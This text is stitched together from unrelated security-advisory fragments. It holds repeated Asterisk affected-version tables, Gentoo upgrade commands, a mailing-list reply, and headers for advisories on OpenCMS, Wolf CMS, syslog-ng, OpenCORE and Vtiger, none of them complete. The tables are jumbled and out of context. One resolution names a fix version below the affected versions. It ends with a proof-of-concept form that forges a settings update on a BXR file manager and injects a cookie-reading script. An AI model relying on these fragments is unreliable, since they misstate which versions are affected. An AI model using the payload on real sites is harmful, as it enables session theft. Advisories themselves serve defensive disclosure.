Open Source
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.0.x       | None                       |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.2.x       | None                       |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.4.x       | 1.4.14 and previous        |
|                             |             | versions                   |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.2.x       | Unaffected                 |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.4.x       | Unaffected                 |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.6.x       | All 1.6.1 versions         |
+------------------------------------------------------------------------+
Overview:
Quote from http://www.piwik.org
"Piwik is a downloadable, open source (GPL licensed) web analytics
software program. It provides you with detailed real time reports
on your website visitors: the search engines and keywords they
used, the language they speak, your popular pages… and so much more.
Piwik aims to be an open source alternative to Google Analytics."
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.6.x       | All versions               |
|-----------------------------+-------------+----------------------------|
| Asterisk Business Edition   | C.3         | All versions               |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.2.x       | 1.2.26-1.2.30.3            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.4.x       | Unaffected                 |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.6.x       | Unaffected                 |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Resolution | Since this is a minor issue, a new release is not         |
|            | immediately planned. However, the issue will be fixed in  |
|            | Asterisk Open Source version 1.4.12 when it is released.  |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.6.1.x     | All versions               |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.6.2.x     | All versions               |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.8.x       | All versions               |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.4.x       | All versions               |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.6.2.x     | All versions               |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.8.x       | All versions               |
+------------------------------------------------------------------------+
"Corrected In" section, or apply a patch specified in the
"Patches" section.
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.8.x       | All versions               |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 10.x        | All versions               |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
|                              Corrected In                              |
|------------------------------------------------------------------------|
| Product                                   | Release                    |
|-------------------------------------------+----------------------------|
| Asterisk Open Source                      | 1.8.10.1                   |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Resolution | Asterisk now performs checks against manager commands that|
|            | cause these behaviors for each of the affected actions.   |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.6.2.x     | All versions               |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.8.x       | All versions               |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 10.x        | All versions               |
|-----------------------------+-------------+----------------------------|
| Asterisk Business Edition   | C.3.x       | All versions               |
+------------------------------------------------------------------------+
Corrected In
+------------------------------------------------------------------------+
| Resolution | The length of the buffer is now checked before appending a|
|            | value to the end of the buffer.                           |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.6.2.x     | All Versions               |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.8.x       | All Versions               |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 10.x        | All Versions               |
+------------------------------------------------------------------------+
Corrected In
Product Release
# emerge --sync
# emerge --ask --oneshot --verbose
">=app-emulation/virtualbox-bin-3.0.12"
All users of the Open Source version of VirtualBox should upgrade to
the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose
">=app-emulation/virtualbox-ose-3.0.12"
Hi Pete,
if this becomes an ISO standard will it still be available for free, or
will you need to pay to get copies of it like you do for other ISO
standards? Also, once the ISO standard is defined, how will new open
source contributions be incorporated?
Pete Herzog wrote:
> The security community may be interested in this:
>
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
#######################################################################
#
# CVE ID : CVE-2009-4505
# Product: OpenCMS OAMP Comments Module
# Vendor: Open Source, Alkacon GmbH (Cologne, Germany)
# Subject: Cross-site scripting (XSS)
# Risk: High
# Effect: Anonymously exploitable
# Author: Cyrill Brunschwiler (cyrill.brunschwiler@csnc.ch)
# Date: March 24th 2010
Introduction:
=============
Wolf CMS is a content management system and is Free Software published under the GNU General
Public License v3. Wolf CMS is written in the PHP programming language. Wolf CMS is a fork of Frog CMS.
The project was a finalist in the 2010 Packt Publishing Open Source Awards in the Most Promising
Open Source Project category. As of the 28th of December 2010, the Wolf CMS code repository was moved
from Google Code to Github.
( Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Wolf_CMS )
multi-platform syslog-replacement application developed by BalaBit IT
Security.
BACKGROUND:
Earlier versions of syslog-ng Open Source Edition and syslog-ng Premium
Edition were vulnerable to a possible Denial of Service. The latest
release (2.0.6 for syslog-ng, 2.1.8 for syslog-ng Premium Edition) fixes a
segmentation fault which occurred when the timestamp of the incoming
messages did not end with a space character (NULL pointer dereference).
This is an easy Denial of Service possibility.
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.0.x       | All versions               |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.2.x       | All versions prior to      |
|                             |             | 1.2.29                     |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.4.x       | Not Affected               |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.0.x       | All versions               |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.2.x       | All versions prior to      |
|                             |             | asterisk-addons-1.2.8      |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.4.x       | All versions prior to      |
#2009-002 OpenCORE insufficient bounds checking during MP3 decoding
Description:
OpenCORE, an open source multimedia decoding subsystem, suffers from an
integer underflow during Huffman decoding resulting in improper bounds
checking when writing to a heap allocated buffer. Decoding a specially
crafted mp3 file will result in unexpected process termination or,
potentially, arbitrary code execution due to heap corruption.
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.2.x       | Unaffected                 |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.4.x       | Unaffected                 |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.6.x       | All 1.6.0, 1.6.1 and 1.6.2 |
|                             |             | releases                   |
+------------------------------------------------------------------------+
Alessandro "jekil" Tanasi (alessandro AT tanasi DOT it)
Date 20101116
I. BACKGROUND
Vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal
for small and medium businesses, with low-cost product support available
to production users that need reliable support.
II. DESCRIPTION
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.0.x       | All versions               |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.2.x       | All versions prior to      |
|                             |             | 1.2.27                     |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.4.x       | All versions prior to      |
|                             |             | 1.4.18.1 and 1.4.19-rc3    |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.0.x       | N/A                        |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.2.x       | N/A                        |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.4.x       | N/A                        |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.0.x       | Not affected               |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.2.x       | Not affected               |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.4.x       | All versions prior to      |
|                             |             | 1.4.10                     |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.0.x       | Unaffected                 |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.2.x       | Unaffected                 |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.4.x       | All versions prior to      |
|                             |             | 1.4.17                     |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                     | Release     |                            |
|                             | Series      |                            |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.0.x       | N/A                        |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.2.x       | N/A                        |
|-----------------------------+-------------+----------------------------|
| Asterisk Open Source        | 1.4.x       | N/A                        |
+------------------------------------------------------------------------+
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/settings/update_settings" method="post" name="main" >
<input type="hidden" name="setting[site_title]" value='BXR File Management System"><script>alert(document.cookie)</script>' />
<input type="hidden" name="setting[site_keywords]" value="BXR, Open Source File Management System" />
<input type="hidden" name="setting[site_description]" value="The Free, Open Source, Ruby on Rails File Management System." />
<input type="hidden" name="setting[let_users_change_default_folder]" value="0" />
<input type="hidden" name="setting[use_ferret]" value="0" />
<input type="hidden" name="setting[overwrite_existing_files]" value="0" />
<input type="hidden" name="commit" value="Update Settings" />